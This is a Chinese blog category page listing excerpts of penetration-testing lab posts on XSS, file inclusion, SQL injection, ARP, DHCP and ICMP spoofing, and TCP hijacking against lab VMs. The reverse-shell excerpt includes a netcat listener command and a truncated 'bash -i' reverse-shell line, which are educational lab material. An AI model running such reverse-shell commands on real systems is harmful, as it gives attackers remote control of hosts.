
安全渗透—Hacker
渗透测试
Eichi_
谦谦君子,温润如玉
展开
-
XSS实战(Level1-10小试牛刀)
文章目录XSS实战说明level1level2level3level4level5level6strtolower()函数说明参数范例level7level8HTML实体转码level9PHP strpos()函数定义和用法相关函数:语法技术细节level10总结:XSS实战说明环境Metasploitable2-Linux步骤:1. 判断是否存在XSS攻击的可能(提交的内容,页面会显示出来)2. 判断可输入内容在标签内(属性)还是值3. 判断闭合(在标签内部的话就需要提前闭合,使XSS的原创 2020-05-15 23:36:17 · 1922 阅读 · 0 评论 -
XSS详解(概念+靶场演示)反射型与存储型的比较与详细操作
目录XSS(跨站脚本攻击)1.XSS简介1.1什么是XSS?1.2 XSS攻击的危害包括:2. 分类2.1反射型2.2存储型3. 构造XSS脚本3.1常用HTML标签3.2常用javascript方法4.反射型(四种安全级别演示)4.4.1低安全级别4.4.2 中安全级别4.4.2 高安全级别4.4.2 不可能安全级别5.存储型(四种...原创 2020-05-04 23:24:56 · 15943 阅读 · 2 评论 -
二、文件包含漏洞 低、中 、高三级别详解(一句话木马,图片木马)
文件包含漏洞项目实验环境OWASP Broken Web Apps VM v1.2 靶场burpsuite 代理服务器Kali-Linux-2020.1-vmware-amd64 攻击机中国菜刀 连接webshelledjpgcom 图片注入代码原理与危害文件包含漏洞:即File Inclusion ,意思是文件包含(漏洞)是,指当服务器开启allow. _url_inclu...原创 2020-04-18 14:29:05 · 5256 阅读 · 0 评论 -
一、文件上传漏洞 低、中、高三级别 详解
一、文件上传漏洞项目实验环境OWASP Broken Web Apps VM v1.2 靶场原创 2020-04-16 20:39:22 · 2131 阅读 · 0 评论 -
SQL注入思维导图
此篇文章就是总结一下SQL注入用到的系统函数,注入的步骤思路**> 关于概念与演示在这里``原创 2020-04-14 00:47:01 · 1627 阅读 · 0 评论 -
SQLI—labs-master(报错型、布尔型、盲注型sql注入)
第五、六关说明:此关为报错型sql注入,意思是,输入信息只有报的错误信息,即不是像前几关一样,直接显示出来想要的数据注入思路: 没有正常的输出位,需要的数据通过报错进行输出显示步骤:前几步与前几关的思路相同,即先判断出来闭合符,输出列数(order by二分法),然后就要用分组的group by语句将不确定的分组进行打印,那么打印的肯定是错误的,即利用打印出来的错误...原创 2020-04-12 12:32:37 · 677 阅读 · 0 评论 -
POST请求小测试(SQL注入)
进入DVWA1.9,将安全防御设置为中等,进入SQL注入模拟表单可以GET也可以POST提交,但是网址栏没有变化,可得其为POST提交可以明显的看出来此页面为POST提交利用Burp来实现代理,在其上进行SQL注入步骤如下判断提交方式 判断闭合符 判断输入列宽度 利用联合查询,查找想要的数据经判断,此页面为POST提交,因为更改表单元素时,地...原创 2020-03-30 23:08:01 · 2208 阅读 · 0 评论 -
SQLI—labs-master(前四关之闭合符详解)
思路:利用漏洞极多的靶场来模拟SQL注入环境:Metasploitable2步骤:1.查看虚拟主机的IP2.开启服务,可见如下的TCP端口就处于开启状态root@metasploitable:~# nmap -p0-65535 192.168.211.132Starting Nmap 4.53 ( http://insecure.org ) at 2020...原创 2020-03-30 01:04:42 · 1908 阅读 · 2 评论 -
Cookie小测试
思路:利用PHP来编写网页进而测试cookie环境:RHEL7.2 安装有httpd,(即Apache),php说明:Php语言的编译位置为/var/www 在其下创建了三个页面,用于测试时的页面跳转 代码在文末测试:1.在登录的主页面输入代码中设置好的用户名与密码字段并勾选自动登录2.点击确定后,页面会跳转至cookie.php,其显示的内容是...原创 2020-03-28 23:55:21 · 310 阅读 · 0 评论 -
TCP半开攻击(伪造客户端发送SYN、伪造服务器发送RST)
TCP syn攻击--半开攻击思路:在服务器等待客户端的ACK回应时,攻击目标服务器的特定端口环境:RHEL7.5是TCP请求方 IP:192.168.211.134 RHEL7.2是服务器 IP:192.168.211.133 Kali是攻击者 IP:192.168.211.130设计:没有攻击时,TCP会话建立是很快的实施:sudo ne...原创 2020-03-18 00:38:25 · 1753 阅读 · 0 评论 -
ICMP的重定向、不可达攻击
ICMP重定向攻击ICMP重定向:字面意思是重新定义方向,即处于一个网段设备A、B、C,A想要去C,却把报文发给了B,B随即告诉A,你直接去C,不用来我这里ICMP重定向攻击:伪造者伪装成网关,就可以分配ICMP重定向后的方向实验环境如下:实验拓扑为:在攻击之前,要保证PC1与PC2能通R1 R2运行OSPF协议测时:PC1->...原创 2020-03-18 00:34:11 · 2752 阅读 · 0 评论 -
《协议栈攻击》思维导图
二层ARP欺骗攻击 MAC洪范攻击三层ICMP攻击IP欺骗攻击 smurf攻击 DHCP欺骗攻击四层DOS/DDOS攻击 UDP拒绝服务 TCP劫持攻击 反弹Shell注入以上都是一些常见的协议栈攻击的方式导图软件用的是Xmind8需要思维导图形式的同学评论区留言...原创 2020-03-16 20:42:07 · 511 阅读 · 6 评论 -
TCP劫持下的反弹Shell注入攻击
反弹Shell的注入思路:通过劫持Server与数据Server的TCP报文,并伪造成Server,向其注入反弹Shell,使攻击者获得对数据Server的完全控制,窃取数据全局模式下测试:攻击者Kali监听这个10000端口$ nc -lp 10000 -vvv数据Server跟Kali进行TCP会话的建立# bash -i>&...原创 2020-03-16 19:29:03 · 1390 阅读 · 0 评论 -
TCP劫持攻击
思路:Hacker获取到Client与Server的TCP会话包(ARP毒化、或者MAC洪范攻击等) 观察Server发给Client的最后一个TCP报文 Hacker通过数据包伪造出一个TCP报文,这个报文是Client回给Server的TCP数据包a.二层的source-mac是hacker机b.三层的ip source是Client主机的IP,目标是Server的IPc.四...原创 2020-03-16 18:54:23 · 3167 阅读 · 0 评论 -
Kali下安装ssh
此篇文章将解决Kali上安装ssh有问题的更换阿里云来进行服务器的连接root@kali:~# vim /etc/apt/sources.listdeb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-roll...原创 2020-03-15 14:33:34 · 567 阅读 · 0 评论 -
ARP欺骗攻击
实验环境为两台运行了NAT的网络模式的虚拟机 分别为Kali webIOU 在eNSP内进行ARP的攻击模拟测试说明:WebIOU这个虚拟机只用作测试VMnet8的网卡连通性,实验中Kail才是伪造ARP表映射的攻击者实验拓扑为:Cloud的解释:Cloud连接到了本地的VMnet8上,所以运行了NAT模式的虚拟机都可以与eNSP上的PC主机ping通...原创 2020-03-15 02:05:42 · 1970 阅读 · 0 评论 -
网络安全基础与常见攻击(ARP攻击、ICMP攻击、DDOS攻击、TCP RST攻击)
原创 2020-03-14 23:26:09 · 1393 阅读 · 0 评论 -
浅谈DHCP欺骗攻击
DHCP欺骗攻击就是伪造真正的DHCP服务器为客户端主机分配一个错误的IP地址接下来通过实验环境详细分析是如何伪造真正的DHCP服务器的实验拓扑如下:说明:R1为真正的额DHCP服务器,R2为欺骗攻击的假的DHCP服务器,R4为客户端主机,R3后面用到在说1.首先进入交换机上,更改连接四个路由器的接口为接入模式并开启端口加速2.DHCP server创建地址池3.主机开启接...原创 2020-02-23 20:31:07 · 9750 阅读 · 4 评论